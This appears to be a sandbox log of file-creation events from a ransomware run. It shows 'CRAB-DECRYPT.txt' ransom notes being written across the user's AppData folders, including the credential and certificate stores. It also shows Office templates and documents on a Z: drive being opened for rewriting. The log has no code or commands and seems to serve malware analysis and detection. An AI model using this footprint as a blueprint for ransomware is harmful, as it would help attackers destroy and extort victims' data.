Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\ZluEZ8VfU.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\SIST02.XSL desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\TURABIAN.XSL desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Credentials\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Crypto\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Crypto\RSA\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2172869166-1497266965-2109836178-1000\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\1033\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create Z:\AeKHMJrNCDYUq.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\usc0a0c3QarsfV.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Excel\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Excel\XLSTART\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\InputMethod\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\InputMethod\Chs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create Z:\Ft1MOn1CIc.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create Z:\1taL0c72JXkGj.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\UserData\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\MMC\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Network\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Network\Connections\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Network\Connections\Pbk\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\MSO1033.acl desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\EmullYJgNTq8y.odt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\con2.LNK desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\index.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\Templates.LNK desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Outlook\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Outlook\Outlook.srs desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\fJJNxlZPFcIOL7N8L.pps desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Outlook\Outlook.xml desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\PowerPoint\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Proof\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Protect\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Protect\S-1-5-21-2172869166-1497266965-2109836178-1000\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Publisher\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Publisher Building Blocks\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Publisher Building Blocks\ContentStore.xml desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Speech\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Spelling\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create Z:\hjOwYAb7YQ2odlEyn.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Spelling\en-US\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\My\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\Cashflow analysis.xltm desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\Theme Colors\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\Theme Effects\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\Theme Fonts\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02836342[[fn=Ion]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\ZcRis.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02892315[[fn=Wisp]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\pEtobMGPdVk4C2adw.csv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02900688[[fn=Facet]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02900771[[fn=Slice]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\sEi0K8sZnqEl5.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090430[[fn=Banded]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090434[[fn=Wood Type]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\oXr639hN3x86Bhd.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457444[[fn=Basis]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457464[[fn=Dividend]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\XmnJxoBkEp9WD4cyN.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457475[[fn=Frame]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457485[[fn=Mesh]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\KtzEQVEZQWFLdAY3Qn.odt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\sbZAE.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457491[[fn=Metropolitan]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457496[[fn=Parallax]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457503[[fn=Quotable]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\ukO9D2qllnBsxnQ.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457510[[fn=Savon]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\UsVrBfwU9tuC5KFqX2K.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457515[[fn=View]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\gr07JV38A.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033917[[fn=Berlin]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033919[[fn=Circuit]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\BhX74jJaOIdhyhcSe5G9.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033921[[fn=Damask]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\xQ6SLR9y03J4ITfu7P.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033925[[fn=Droplet]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\4z3uag.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033927[[fn=Main Event]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\BokNObz8UcZzwf.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033929[[fn=Slate]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\rYZw8NqY13.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\Kn7qhmeLrMy5AdqLU92.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033937[[fn=Vapor Trail]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\sDKhau.doc desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001103[[fn=Headlines]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\8qGeXH1kIXTzNAwh1.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001104[[fn=Feathered]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\991tuWIWnfwOaO.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001105[[fn=Crop]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001114[[fn=Gallery]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\LOFKJdnEn4MzMXm.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001115[[fn=Parcel]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\RH3IiU0yMrDFNR6DKs.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM16401371[[fn=Atlas]].thmx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328884[[fn=architecture]].glox desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328893[[fn=BracketList]].glox desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\iWJTz4KEmPveSMxUQ8.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328905[[fn=Chevron Accent]].glox desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328908[[fn=Circle Process]].glox desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328916[[fn=Converging Text]].glox desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328919[[fn=Hexagon Radial]].glox desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328925[[fn=Interconnected Block Process]].glox desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
